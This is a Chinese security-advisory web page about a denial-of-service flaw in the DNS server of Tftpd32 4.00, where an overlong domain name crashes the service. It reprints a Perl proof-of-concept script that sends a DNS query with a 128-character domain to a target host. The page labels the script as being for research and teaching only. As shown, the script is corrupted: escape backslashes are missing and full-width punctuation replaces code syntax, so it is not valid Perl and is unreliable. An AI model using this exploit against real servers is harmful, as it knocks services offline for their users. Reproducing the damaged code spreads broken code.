首页 / 操作系统 / Linux / Tftpd32 DNS服务器拒绝服务漏洞

发布日期：2012-05-28
更新日期：2012-05-29受影响系统：
TFTPD32 TFTPD32 4.00
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 53704Tftpd32是Windows平台上的TFTP和DHCP服务器。TFTPD32 4.00之前版本在实现上存在拒绝服务漏洞，DNS服务器绑定了UDP端口53，但没有验证域选项大小，在发送超过127个字符时，攻击者可利用此漏洞造成服务器崩溃。<*来源：demonalex
 
  链接：http://www.securityfocus.com/archive/1/522877
*>测试方法：
--------------------------------------------------------------------------------警 告以下程序（方法）可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！demonalex （）提供了如下测试方法：Proof Of Concept :
-----------------------------------------------------------
#！/usr/bin/perl
use IO::Socket;
use Socket;
use Math::BigInt;
$|=1;
$host=shift;
$port=shift || "53";
die "usage: $0 $host [$port] " if（！defined（$host））;
$target_ip = inet_aton（$host）;
$target = sockaddr_in（$port, $target_ip）;
$crash="A"x128;
$transaction_id_count=1;
sub dns_struct_pack（$）{
        $domain=shift;                  #domain
        $type="x00xff";               #dns_type = ANY
        $transaction_id_count=1 if（$transaction_id_count > 255）;
        $x=Math::BigInt->new（$transaction_id_count）;
        $x=~s/0x//;
        $transaction_id=sprintf（"x00".chr（$x））;
        $flag="x01x00";
        $question="x00x01";
        $answer_rrs="x00x00";
        $authority_rrs="x00x00";
        $additional_rrs="x00x00";
        if（$domain ne "0"）{
                undef（$domain_length）;
                $domain_length=length（$domain）;
                $y=Math::BigInt->new（$domain_length）;
                $y=~s/0x//;
                $domain_length=chr（$y）;
        }
        $class="x00x01";                    #IN
        $transaction_id_count++;
        if（$domain eq "0"）{
$packet_struct="$transaction_id"."$flag"."$question"."$answer_rrs"."$authority_rrs"."$additional_rrs"."x00"."$type"."$class";
        }else{
         $packet_struct="$transaction_id"."$flag"."$question"."$answer_rrs"."$authority_rrs"."$additional_rrs"."$domain_length"."$domain".
                "x00"."$type"."$class";
        }
        return $packet_struct;
}
print "Launch attack ... ";
socket（SOCK1, AF_INET, SOCK_DGRAM, 17）;
send（SOCK1, &dns_struct_pack（$crash）, 0, $target）;
close（SOCK1）;
print "Finish！ ";
exit（0）;
-----------------------------------------------------------建议：
--------------------------------------------------------------------------------
厂商补丁：TFTPD32
-------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：http://tftpd32.jounin.netWinRadius密码选项大小验证缓冲区溢出漏洞Seagate BlackArmor管理员密码重置安全漏洞相关资讯      拒绝服务漏洞 

数字签名拒绝服务漏洞（CVE-2013-  （11/13/2013 12:25:03） Intel 82574L Gigabit Ethernet   （03/01/2013 21:09:03） Wireshark DTN Dissector 拒绝服务  （02/03/2013 10:37:43）

Rockwell Automation FactoryTalk   （04/10/2013 09:08:12） IBM WebSphere Message Broker多个  （03/01/2013 21:04:45） HP XP P9000 Command View   （02/03/2013 10:36:32）

本文评论 查看全部评论 （0）

表情： 姓名： 匿名字数 同意评论声明 发表 评论声明 尊重网上道德，遵守中华人民共和国的各项有关法律法规 承担一切因您的行为而直接或间接导致的民事或刑事法律责任 本站管理人员有权保留或删除其管辖留言中的任意内容 本站有权在网站内转载或引用您的评论 参与本评论即表明您已经阅读并接受上述条款

收藏该网址 版权所有©石家庄振强科技有限公司2024 冀ICP备08103738号-5 网站地图